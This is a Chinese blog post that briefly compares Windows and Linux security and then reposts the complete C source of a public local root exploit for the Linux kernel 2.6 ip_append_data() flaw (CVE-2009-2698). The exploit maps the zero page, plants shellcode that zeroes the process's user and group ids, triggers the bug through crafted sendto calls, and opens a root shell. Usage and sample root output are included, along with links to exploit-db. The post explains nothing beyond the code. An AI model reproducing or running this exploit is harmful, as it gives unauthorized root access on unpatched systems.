Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit

最新推荐文章于 2024-09-18 10:25:00 发布
最新推荐文章于 2024-09-18 10:25:00 发布
阅读量1.3k 收藏
点赞数
分类专栏: mark 文章标签: linux centos microsoft socket windows security

linux 又爆一本地提权的漏洞,据之前的本地提权的漏洞时间很短啊···昨天还和朋友说起过,到底是 windows 安全还是 linux 安全?你说windows 不安全,Microsoft 用到现在也没啥大的问题,你说 Linux 安全,但又经常被一下子就到 root 了··所以说没有不安全的系统,只有不安全的人,最重要的还是用这操作系统的人,人才是安全的根本....

附一个来自包子 Blog 的利用截图




另附 EXP :

/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
  unsigned *addr=task;
  while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
    addr++;
  }
  addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
  addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
  return;
}
void exploit();
void kernel_code()
{
  asm("exploit:\n"
    "push %eax\n"
    "movl $0xfffff000,%eax\n"
    "andl %esp,%eax\n"
    "pushl (%eax)\n"
    "call get_root_uid\n"
    "addl $4,%esp\n"
    "popl %eax\n");
  return;
}
void *kernel=kernel_code;

int main(int argc, char **argv)
{
  int fd=0;
  char buf[1024];
  struct sockaddr x0x;
  void *zero_page;

  uid=getuid();
  gid=getgid();
  if(uid==0){
    fprintf(stderr,"[-] check ur uid\n");
    return -1;
  }
  if(personality(0xffffffff)==PER_SVR4){
    if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
      perror("[-] mprotect()");
      return -1;
    }
  }
  else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
      perror("[-] mmap()");
      return -1;
  }
  *(unsigned long *)0x0=0x90909090;
  *(char *)0x00000004=0x90; /* +1 */
  *(char *)0x00000005=0xff;
  *(char *)0x00000006=0x25;
  *(unsigned long *)0x00000007=(unsigned long)&kernel;
  *(char *)0x0000000b=0xc3;

  if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
    perror("[-] socket()");
    return -1;
  }
  x0x.sa_family=AF_UNSPEC;
  memset(x0x.sa_data,0x82,14);
  memset((char *)buf,0,sizeof(buf));
  sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
  sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
  if(getuid()==uid){
    printf("[-] exploit failed, try again\n");
    return -1;
  }
  close(fd);
  execl("/bin/sh","sh","-i",NULL);
  return 0;
}

/* eoc */

 

 

 

via.http://www.exploit-db.com/exploits/9542/

 

相关http://www.15897.com/blog/post/Linux-Kernel-2.x-sock_sendpage-Local-Root-Exploit.html 

 

http://baoz.net/linux-localroot-no-patch-again/

 

 

http://bbs.chinaunix.net/redirect.php?goto=findpost&ptid=1960669&pid=14038426

lazze
关注
专栏目录
Linux网络协议栈--ip_append_data函数分析
明何
08-07 8351
开场白: 要分析这个函数原因有两个: 一个是前几天要写《Linux网络协议栈--UDP》结果卡在这个函数这了。 另外一个就是这个函数又是UDP报文必经之路,而且对其理解对于套接口中发送队列的理解非常有帮助,所以认真去学习了下。 文章定位: (1)尽可能撇开一些不需要的细节,重点介绍流程 (2)说明发送队列是如何组织起来的 (3)书本肯定都比我说的好,要真的看明白,还是需要看书
ip_append_data函数
City_of_skey的博客
11-18 971
ip_append_data函数是传输层调用缓冲要发送的数据包,主要调用协议数据包有UDP数据包、TCP管理报文。当数据包缓冲到一定大小(PMTU)就调用ip_push_pending_frames函数将数据包发送给IP层,这样可以提高效率,由ip_push_pending_frames维护IP协议头。如果传输层要提高响应时间,可以在每次调用ip_append_data函数后立即调用ip_push...
linux2.6内核本地提权
weixin_33912246的博客
01-03 693
 linux2.6内核本地提权 It is possible to exploit this flaw to execute arbitrary code as root. Please note, this is a low impact vulnerability that is...
ip_append_data分析
bin_linux96的专栏
03-02 897
1、基本原理    UDP发包流程中,当没有cork的情况下,会走过udp_sendmsg到达ip_append_data,该接口是IP层提供的UDP和RAW Socket的发包接口,同时,TCP中用于发送ACK和RST报文的接口ip_send_reply最终也会调用此接口    该接口的主要作用是:将数据拷贝到适合的skb(利用发送队列中现有的或新创建)中,可能有两种情况:     1)放入sk...
LINUX KERNEL 2.6 < 2.6.19 (32BIT) IP_APPEND_DATA() LOCAL RING0 ROOT EXPLOIT
weixin_33742618的博客
10-28 99
Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit这个本地提权root漏洞的exp,使用方法很简单:gcc -o ts2.6.c moo # 编译,生成moo./moo # 直接溢出完成后就是root提供源码和编译好的下载。源码:下载文件 (已下载 2 次...
Linux Kernel 2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit
xiuchun2009的专栏
09-30 400
/***** 0x82-CVE-2009-2698** Linux kernel 2.6 **** Tested White Box 4(2.6.9-5.ELsmp),** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.
Linux 2.6 kernel versions below 2.6.19 32bit ip_append_data() ring() root exploit.
cnbird's blog
09-26 550
http://www.packetstormsecurity.org/0909-exploits/0x82-CVE-2009-2698.c
linux ip_conntrack_max,ip_conntrack_max调优必读(内容正确且全面)
weixin_34195649的博客
05-06 374
Netfilter conntrack performance tweaking, v0.8Hervé Eychenne This document explains some of the things you need to know for netfilter conntrack (and thus NAT) performance tuning.Latest version of this...
linux kernel 2.6.32 local root,GitHub - rootorben/linux-kernel-exploits: linux-kernel-exploits Linux...
weixin_39716160的博客
05-13 213
CVE–2018–18955  [map_write() in kernel/user_namespace.c allows privilege escalation](Linux kernel 4.15.x through 4.19.x before 4.19.2)CVE–2018–1000001  [glibc](glibc <= 2.26)CVE-2017-1000367  [Sudo...
工业电子中的基于2.6.19内核的小型Linux系统制作移植
12-01
4. **2.6内核的优势**:Linux 2.6内核相比2.4内核有显著改进,包括性能提升、更多设备支持、内部接口标准化和设备添加简化等,使得它更适合在嵌入式系统中使用。 5. **小型Linux系统制作**:构建一个小型Linux系统...
嵌入式系统/ARM技术中的基于2.6.19内核的小型Linux系统制作与移植
12-05
引言 ARM9 S3C2410微处理器与Linux的结合越来越紧密,逐渐在嵌入式领域得到广范的应用。目前,在便携式消费类电子产品、无线设备、汽车、网络、存储产品等都可以看到S3C2410与Linux相结合的身影。 S3C2410微处理器...
Linux2.6内核的定制.doc
06-25
Linux2.6内核定制详解》 Linux操作系统以其开源、免费、稳定和高效的特点,深受全球开发者的喜爱。在Linux内核的漫长发展历史中,Linux2.6内核是一个重要的里程碑,它引入了许多创新的技术和优化,使得内核性能...
navicate远程linux上的pgsql提示密码失败
记录、分享、合作、共赢
09-14 376
2、postgresql.conf文件中,修改listen_addresses。3、重启pgsql,例如:systemctl restart pgsql。1、pg_hba.conf文件中,ipv4下面的内容改成。4、如果问题还在,检查firewalld防火墙,执行。5、再次尝试连接,成功!
Linux】uImage头部信息详细解析
W__winter的博客
09-16 1563
【代码】【Linux】uImage头部信息详细解析。
linux-网络相关概念
zdd56789的博客
09-17 643
linux-网络相关概念
linux-进程管理-进程查看与控制
Flying_Fish_roe的博客
09-18 590
进程是操作系统中执行中的程序。Linux 将每个运行的程序看作是一个进程,每个进程都有唯一的进程ID (PID)。在 Linux 系统中,进程管理是非常重要的,它能够帮助系统管理员和用户查看、管理、优化系统资源的使用情况。Linux 提供了丰富的命令来查看和控制进程,例如pstophtopkill等等。这些命令允许用户监控和控制系统中运行的进程,以确保系统资源的合理使用,并避免进程阻塞或占用过多资源。在 Linux 系统中,进程管理是非常关键的操作。通过使用pstophtop。
Linux Kernel Makefiles 编译标志详解
最新发布
m0_66404702的博客
09-18 487
ccflags-yccflags-y用于定义C编译器的编译选项,这些选项仅对当前Makefile文件有效。例如,如果你需要为特定的源文件添加宏定义,可以在Makefile中使用ccflags-y。asflags-y类似于ccflags-y,但asflags-y是为汇编器定义的选项。这些选项仅影响汇编过程,适用于需要特殊汇编指令或宏定义的场景。ldflags-yldflags-y用于定义链接器的选项,控制链接过程中的行为,如指定库文件的路径或链接时使用的特殊选项。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值